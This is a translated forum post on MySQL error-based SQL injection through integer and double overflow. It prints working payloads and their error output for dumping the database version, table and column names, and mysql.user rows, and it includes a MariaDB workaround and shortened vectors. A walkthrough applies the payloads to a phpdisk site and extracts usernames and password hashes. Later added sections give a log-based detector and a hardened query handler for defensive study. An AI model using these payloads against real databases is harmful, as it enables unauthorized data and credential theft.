from:https://rdot.org/forum/showthread.php?t=3167

The original post is in Russian, so this is only a rough translation.

This error-based injection relies on MySQL data type overflow (it does not work on older MySQL versions).

mysql> SELECT 18446744073709551610 * 2;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'
mysql> SELECT -1 * 9223372036854775808;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(-(1) * 9223372036854775808)'

Below are some exploitation examples.

// Dump the database version

mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610)); 

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select '5.5' from dual),18446744073709551610,18446744073709551610))' 

// Output: 452 characters

// Dump the column names

mysql> SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610);

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` AS `article`,`test`.`shop`.`dealer` AS `dealer`,`test`.`shop`.`price` AS `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610))'

// Find out the names of the columns in the table

// Dump the column values

mysql> SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610); 

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'localhost','root','*','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','','0','0','0','0','','' from dual limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),18446744073709551610,18446744073709551610))' 

// Output the data from all columns at once

Since this is error-based injection, there is one more thing we need to understand: the maximum length of a MySQL error message:

mysys/my_error.c:

/* Max length of a error message. Should be kept in sync with MYSQL_ERRMSG_SIZE. */
#define ERRMSGSIZE (512)

Apart from that, one more issue deserves mention: if you are using MariaDB (a fork of MySQL), when you try this you will find that the desired information is not revealed:

mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select #),18446744073709551610,18446744073709551610))'

For MariaDB we can work around it like this:

mysql> SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a;
ERROR 1690 (22003): BIGINT value is out of range in '(('5.5-MariaDB' is not null) - -(9223372036854775808))'

// Output: 475 characters

Now let's try to shorten our vector.

// Query the database version

SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))

is equivalent to

select 1E308*if((select*from(select version())x),2,2)
SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a

is equivalent to

select if(x,2,2)*1E308 from(select version()x)y

// Get the column names

SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610)

is equivalent to

select 1E308*if((select*from(select*from mysql.user)``limit 1)>(select*from mysql.user limit 1),2,2)

// Get all column values

SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610)

is equivalent to

select 1E308*if((select*from(select*from mysql.user LIMIT 1)``limit 1)<(select*from mysql.user limit 0),2,2) 

// Get the values of specified columns

select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)

// Get the number of columns

select 1E308*if((select*from mysql.user limit 1)>(select 1),2,2)

Other

SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a

select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2);
=>
select 2*if((select user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit 1),1e308,0);

mysql> select (select * from mysql.user)=1;
mysql> select (select * from mysql.user)in(1);
ERROR 1241 (21000): Operand should contain 42 column(s)

select if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)*1E308
SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a
select (x!=0x00)--9223372036854775808 from(SELECT version()x)y

mysql> select!x-~0.FROM(select+user()x)f;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'
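Every vector above leaves two signals a defender can key on: the request carries one of the overflow constants, the 1E308*if( form or the !x-~0 form, and the response body or application log carries an ERROR 1690 / ERROR 1241 message that echoes the evaluated expression back. The following Python is an added example, not part of the original post: it scans constructed access-log lines (the log format is an assumption) and constructed error strings modelled on the messages shown above, flags the request-side indicators, and classifies each error message by what it exposes, including the MariaDB `select #` masking and a message cut short at the server's buffer limit. All names in it are this example's own.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Request-side indicators of the overflow vector family: the two BIGINT edge constants,
# the DOUBLE overflow via 1E308, and the !x-~0 form. Indicator names are assumptions.
REQUEST_INDICATORS = {
    "bigint_unsigned_edge": re.compile(r"18446744073709551610"),
    "bigint_signed_edge": re.compile(r"9223372036854775808"),
    "double_overflow_if": re.compile(r"1e308\s*\*\s*if\s*\(", re.IGNORECASE),
    "if_times_double": re.compile(r"\)\s*\*\s*1e308", re.IGNORECASE),
    "not_minus_bitnot": re.compile(r"!\s*\w+\s*-\s*~\s*0", re.IGNORECASE),
}

# Response-side: the two MySQL error families the technique depends on.
RANGE_ERROR = re.compile(
    r"ERROR 1690 \(22003\): (?P<type>BIGINT UNSIGNED|BIGINT|DOUBLE) value is out of range in '(?P<expr>.*)$"
)
OPERAND_ERROR = re.compile(r"ERROR 1241 \(21000\): Operand should contain (?P<n>\d+) column\(s\)")
STRING_LITERAL = re.compile(r"'((?:[^'\\]|\\.)*)'")   # '...' literals, with \' escapes
IDENTIFIER = re.compile(r"`([^`]+)`")                 # `...` quoted table/column names


def scan_request(line):
    """Return the indicator names matching the URL-decoded query string of an access-log line.
    Assumed (constructed) format: '<ip> - - [<ts>] "GET <path> HTTP/1.1" <status> <bytes>'."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
    if not m:
        return []
    query = unquote_plus(urlsplit(m.group(1)).query)
    return [name for name, rx in REQUEST_INDICATORS.items() if rx.search(query)]


def classify_error(line):
    """Classify a MySQL error string echoed in a response body or application log.
    Returns None for anything that is not one of the two error families."""
    m = RANGE_ERROR.search(line)
    if m:
        expr = m.group("expr")
        body = expr[:-1] if expr.endswith("'") else expr
        literals = STRING_LITERAL.findall(body)
        identifiers = IDENTIFIER.findall(body)
        return {
            "code": 1690,
            "type": m.group("type"),
            "echoed_literals": literals,
            "echoed_identifiers": identifiers,
            # MariaDB prints the subquery as "select #", so nothing from it is exposed.
            "exposes_data": bool(literals or identifiers) and "select #" not in body,
            # A missing closing quote means the server cut the message at its buffer limit.
            "truncated": not expr.endswith("'"),
        }
    m = OPERAND_ERROR.search(line)
    if m:
        # The column count of the compared subquery is itself information about the schema.
        return {"code": 1241, "type": None, "echoed_literals": [], "echoed_identifiers": [],
                "exposes_data": True, "truncated": False, "column_count": int(m.group("n"))}
    return None


def triage(access_lines, response_lines):
    """Pair the two signals: which requests carried the vector, which responses leaked data."""
    suspicious = {i: scan_request(l) for i, l in enumerate(access_lines)}
    suspicious = {i: names for i, names in suspicious.items() if names}
    leaks = [c for c in map(classify_error, response_lines) if c and c["exposes_data"]]
    return suspicious, leaks


# Constructed sample input (not from the original post), modelled on the messages shown above.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /file.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /file.php?id=1+and+(select+1E308*if((select*from+pd_files+limit+1)%3E(select+1),2,2)) HTTP/1.1" 500 312',
    '203.0.113.5 - - [10/Oct/2023:13:55:47 +0000] "GET /file.php?id=1+union+select+1,2,2*if((select*from(select+version())s),18446744073709551610,18446744073709551610) HTTP/1.1" 500 340',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /file.php?id=2 HTTP/1.1" 200 4870',
]
SAMPLE_RESPONSES = [
    "ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select '5.5' from dual),18446744073709551610,18446744073709551610))'",
    "ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select #),18446744073709551610,18446744073709551610))'",
    "ERROR 1241 (21000): Operand should contain 35 column(s)",
    "ERROR 1690 (22003): DOUBLE value is out of range in '(1E308 * if(((select `userid`,`username`,`password` from (select `phpdisk`.`pd_users`.`userid` AS ",
    "1 row in set (0.00 sec)",
]

if __name__ == "__main__":
    suspicious, leaks = triage(SAMPLE_ACCESS_LOG, SAMPLE_RESPONSES)
    for i, names in suspicious.items():
        print(f"request {i}: {', '.join(names)}")
    for leak in leaks:
        print(leak)
```

The request-side patterns are deliberately narrow (the literal edge constants and the 1E308 multiplication) so they stay quiet on normal traffic; the response-side check is the one that matters for scoping, because a 1690 message with quoted literals or backticked identifiers is proof that the database's evaluated expression, not just a generic error, reached the client.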

-------------------------------------------------

I tried it myself and found it works quite well, so I'm attaching that as well:

Suppose http://example.com/file.php?id=1 has an SQL injection here, and we want to prove that the administrator account password can be obtained.

1. First get the number of columns (here the method from the article is used instead; in practice the table name is unknown, so it still comes down to walking through ORDER BY one value at a time)

mysql> select * from pd_files where file_id=1 and (select 1E308*if((select*from pd_files limit 1)>(select 1),2,2)); 

ERROR 1241 (21000): Operand should contain 35 column(s)

2. Once the column count is known, the old routine plus the new error method: dump all tables

mysql> select * from pd_files where file_id=1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,2 * if((SELECT * from (select group_concat(table_name) from information_schema.table_constraints where constraint_schema=database() limit 1) as `` limit 1) < (1), 18446744073709551610, 18446744073709551610); 

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'pd_adminsession,pd_advertisements,pd_announces,pd_buddys,pd_categories,pd_comments,pd_cp_shortcut,pd_disk2user,pd_disks,pd_extracts,pd_file2tag,pd_files,pd_folders,pd_gallery,pd_groups,pd_invitelog,pd_langs,pd_links,pd_messages,pd_navigations,pd_orders,pd_plugins,pd_replys,pd_reports,pd_search_index,pd_servers,pd_settings,pd_stats,pd_tags,pd_templates,pd_topics,pd_users' from dual limit 1) < 1),18446744073709551610,18446744073709551610))'

3. The suspicious table name pd_users appears; provisionally assume pd_users is the admin table. Dump all of its columns:

mysql> select * from pd_files where file_id=1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,1E308*if((select*from(select*from pd_users)``limit 1)>(select*from pd_users limit 1),2,2); 

ERROR 1690 (22003): DOUBLE value is out of range in '(1E308 * if(((select `userid`,`username`,`password`,`email`,`gid`,`reset_code`,`is_activated`,`is_locked`,`last_login_time`,`last_login_ip`,`reg_time`,`reg_ip`,`credit`,`wealth`,`rank`,`exp`,`accept_pm`,`show_email`,`space_pos`,`user_file_types`,`user_store_space`,`user_rent_space`,`space_day_credits`,`down_flow_count`,`view_flow_count`,`flow_reset_time`,`max_flow_down`,`max_flow_view` from (select `phpdisk`.`pd_users`.`userid` AS `userid`,`phpdisk`.`pd_users`.`username` AS 

4. Get the key column values:

mysql> select * from pd_files where file_id=1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,1E308*if((select username||password from(select*from pd_users LIMIT 1)a limit 1),2,2); 

ERROR 1690 (22003): DOUBLE value is out of range in '(1E308 * if((select ('xsstest2<a>a' or '"xss123\'/') from dual limit 1),2,2))'

Finally, verify it

mysql> select username,password from pd_users;
+--------------+----------------------------------+
| username     | password                         |
+--------------+----------------------------------+
| xsstest2<a>a | "xss123\'/                       |
| phpdisk_demo | fcf41657f02f88137a1bcf068a32c0a3 |
| xsstest      | 44b22f2bf7c7cfa05c351a5bf228fee0 |
+--------------+----------------------------------+
3 rows in set (0.00 sec)
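The walkthrough works only because of two defects in the application: the id parameter is spliced into the SQL text, and the database's error text is returned to the client. The following is an added example, not code from the post or from phpdisk: a vulnerable handler beside a hardened one, run against a constructed in-memory SQLite schema that stands in for the pd_files / pd_users tables (table and column names assumed, data invented). SQLite has no if() function and does not raise MySQL's out-of-range error, so the text that leaks differs, but the two defects (string concatenation, verbatim error echo) and their fixes (type check plus bound parameter, generic error with server-side logging) are the same ones that apply to the MySQL case above.

```python
import logging
import sqlite3

log = logging.getLogger("file.php")

# Constructed stand-in for the phpdisk tables seen in the walkthrough (names assumed, data invented).
SCHEMA = """
CREATE TABLE pd_files (file_id INTEGER, file_name TEXT);
CREATE TABLE pd_users (username TEXT, password TEXT);
INSERT INTO pd_files VALUES (1, 'readme.txt'), (2, 'notes.txt');
INSERT INTO pd_users VALUES ('phpdisk_demo', 'fcf41657f02f88137a1bcf068a32c0a3');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_unsafe(conn, raw_id):
    """The pattern behind file.php?id=...: raw_id is spliced into the SQL text and the
    driver's error message is handed straight back to the client."""
    try:
        rows = conn.execute(f"SELECT * FROM pd_files WHERE file_id={raw_id}").fetchall()
        return {"status": 200, "rows": rows}
    except sqlite3.Error as exc:
        return {"status": 500, "body": str(exc)}  # the leak: evaluated expression reaches the client


def lookup_hardened(conn, raw_id):
    """Same lookup with both defects removed: the id is type-checked and bound as a
    parameter, and database errors are logged server-side but never echoed."""
    try:
        file_id = int(raw_id)
    except ValueError:
        return {"status": 400, "body": "invalid id"}
    try:
        rows = conn.execute("SELECT * FROM pd_files WHERE file_id=?", (file_id,)).fetchall()
        return {"status": 200, "rows": rows}
    except sqlite3.Error:
        log.exception("database error while serving id=%r", raw_id)
        return {"status": 500, "body": "internal error"}


# Constructed inputs: a normal id, a union form, and the 1E308*if( overflow form from step 1.
PAYLOADS = {
    "normal": "1",
    "union": "1 union select username,password from pd_users",
    "overflow": "1 and 1E308*if(1,2,2)",
}


def compare():
    """Run every payload through both handlers; returns {name: (unsafe_result, hardened_result)}."""
    conn = make_db()
    return {name: (lookup_unsafe(conn, p), lookup_hardened(conn, p)) for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (unsafe, hardened) in compare().items():
        print(f"{name:9} unsafe={unsafe}")
        print(f"{'':9} hardened={hardened}")
```

For a numeric parameter the int() check alone already defeats the injection, but the bound parameter is the fix that generalises to string inputs, and the generic error response is what removes the error-based channel even where a query does fail: the detail still lands in the server log, where it can be alerted on, instead of in the HTTP response.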
